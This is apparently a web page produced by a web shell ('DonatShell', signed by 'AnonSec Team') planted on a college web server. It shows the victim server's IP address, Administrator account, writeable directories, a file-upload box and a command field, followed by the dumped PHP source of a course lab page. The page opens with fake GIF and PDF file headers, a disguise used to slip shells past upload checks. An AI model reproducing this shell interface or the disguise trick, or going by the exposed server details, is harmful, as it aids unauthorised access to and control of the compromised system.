GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/JimMartinson/_Archive/MMDT1146/Labs/Lab01/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/JimMartinson/_Archive/MMDT1146/Labs/Lab01/Lab01.phpinc
<?
// JimMartinson/MMDT1146/Lab01.phpinc

include('Course/courseInfo.phpinc');
include('../../classInfo.phpinc');

$evaluationNumber = 1;
$evaluationType = "Lab";
$evaluationTitle = "Class Setup";
if ( !isset($assignmentSuffix) ) $assignmentSuffix = '';
$evaluationName = $evaluationType.twoDigit($evaluationNumber).$assignmentSuffix;
$title = $evaluationName.": ".$evaluationTitle;
$headTitle = '_CST_ - '.$courseNumber.' '.$courseTitle.' - '.$title;
$pageTitle = $courseNumber.' '.$courseTitle.'<br>'.$title;
$pageMenu = 'Course/courseMenu.phpinc';
$smallTitle = true;
$js='openCenteredWindow';
$smallTitle = true;
include('common/pageHeader.phpinc');
$sectionTitle = $title;
include('common/sectionHeader.phpinc');

include('Gradebook/EvaluationSubmission_BEGIN.phpinc');
$uploadFilename = $userFileName.'-'.$evaluationName.'.png';

?>
<?=$f_message?>
<a name="Lab"></a>
<fieldset><legend>Description</legend>
Setup your computer for class.
</fieldset>
<?
$ShowSpanCountBefore = false;
#$ShowSpanCountBefore = true;
?>
<style type="text/css">
b { white-space:nowrap; }
<? if ( !$ShowSpanCountBefore ) { ?>//<? } ?> span.count:before { content:counters(item, "-"); color:#FF0000; }
comment { color:#0c0; background-color:#ffc; }
tt, samp, var { padding:0; }
tt { color:#00f; }
samp { color:#c00; }
var { font-style:normal; }
</style>
<?
/** /
tt = tag
samp = attribute
var = attribute value
/**/
?>
<fieldset><legend><?=$evaluationType?> <?=$evaluationNumber?> assignment</legend>
<ol id="main" class="count">
	<li>Perform <a href="../../../Setup/ClassFolderSetup/?dataFolder=Data_WWW&amp;courseNumber=<?=$courseNumber?>&amp;courseTitle=PHP Programming" target="_blank"><?=$courseNumber?> Class Folder Setup</a>.</li>
	<li>Perform <a href="../../../Setup/WebServices/?dataFolder=Data_WWW&amp;courseNumber=<?=$courseNumber?>&amp;courseTitle=PHP Programming" target="_blank">WebServices Installation</a>.</li>
	<li>Perform <a href="../../../Setup/Apache/?dataFolder=Data_WWW&amp;courseNumber=<?=$courseNumber?>&amp;courseTitle=PHP Programming" target="_blank">Apache Installation</a>.</li>
	<li>Perform <a href="../../../Setup/PHP/?dataFolder=Data_WWW&amp;courseNumber=<?=$courseNumber?>&amp;courseTitle=PHP Programming" target="_blank">PHP Installation</a>.</li>
  <li>Turn in your assignment:
		<ol type="a">
			<li>Take a screenshot of the phpinfo.php file in the browser and save it as<b> <?=$uploadFilename?></b>.</li>
			<li>Browse and select your <b><?=$uploadFilename?></b> file: <input type="file" name="fileUpload"></li>
			<li>Then <input type="submit" name="f_subtask" value="Submit"> for grading.</li>
		</ol>
  </li>
</ol>
</fieldset>
<?
/** /
	<li>Perform <a href="../../../Setup/MySQL/?dataFolder=Data_WWW&amp;courseNumber=<?=$courseNumber?>&amp;courseTitle=PHP Programming" target="_blank">MySQL Installation</a>.</li>
	<li>Perform <a href="../../../Setup/Dreamweaver/?dataFolder=Data_WWW&amp;courseNumber=<?=$courseNumber?>&amp;courseTitle=PHP Programming" target="_blank">Dreamweaver Configuration</a>.</li>
/**/
?>
<?
/** /
<br><code>code</code> <codechange>codechange</codechange> <codeold>codeold</codeold> <comment>comment</comment> <entry>entry</entry> <kbd>kbd</kbd> <samp>samp</samp> <tt>tt</tt> <ttchange>ttchange</ttchange> <var>var</var>
   	<br><a href="mailto:jim.martinson@ridgewater.edu?subject=<?=$courseNumber?> <?=$evaluationName?> Submission">Send an email</a> to jim.martinson@ridgewater.edu with a subject of <b style="white-space:nowrap"><?=$courseNumber?> <?=$evaluationName?> Submission</b> and attach the following files:
<br><code>code</code> <codechange>codechange</codechange> <codeold>codeold</codeold> <comment>comment</comment> <entry>entry</entry> <kbd>kbd</kbd> <samp>samp</samp> <tt>tt</tt> <ttchange>ttchange</ttchange> <var>var</var>
	<li>Level_1_li.
		<br>More_level_1_text.
	</li>
	<li>Level_1_li.
		<ol>
			<li>Level_2_li.
				<br>More_level_2_text.
			</li>
			<li>Level_2_li.</li>
		</ol>
	</li>
	<li>Level_1_li.
		<ol>
			<li>Level_2_li.
				<br>More_level_2_text.
				<ol>
					<li>Level_3_li.</li>
					<li>Level_3_li.</li>
				</ol>
			</li>
			<li>Level_2_li.</li>
		</ol>
	</li>
/**/
include('Gradebook/EvaluationSubmission_END.phpinc');
$deductionPoints = $evaluationInfo['evaluationPoints'] / 10; if ( $deductionPoints == 1 ) { $deductionPoints = '1 point'; } else { $deductionPoints = $deductionPoints.' points'; }
?>
<fieldset><legend>Grading Criteria</legend>
Demonstrated assignment effectively: <b><?=$evaluationInfo['evaluationPoints']?></b> points.
<br>
There are some things I expect. If they are incorrect you will lose the following:
<br>
Work submitted incorrectly: -<?=$deductionPoints?>.
<br>
Work submitted late: -<?=$deductionPoints?> per week.
<br>
Re-submission of work for grading: -<?=$deductionPoints?> per submission.
<br>
I reserve the right <b>not</b> to apply the deduction points at my absolute discretion.
</fieldset>
<?
include('../../ReferencesResources.phpinc');
include('common/sectionFooter.phpinc');
#setDebugOn();
?>

Anon7 - 2022
AnonSec Team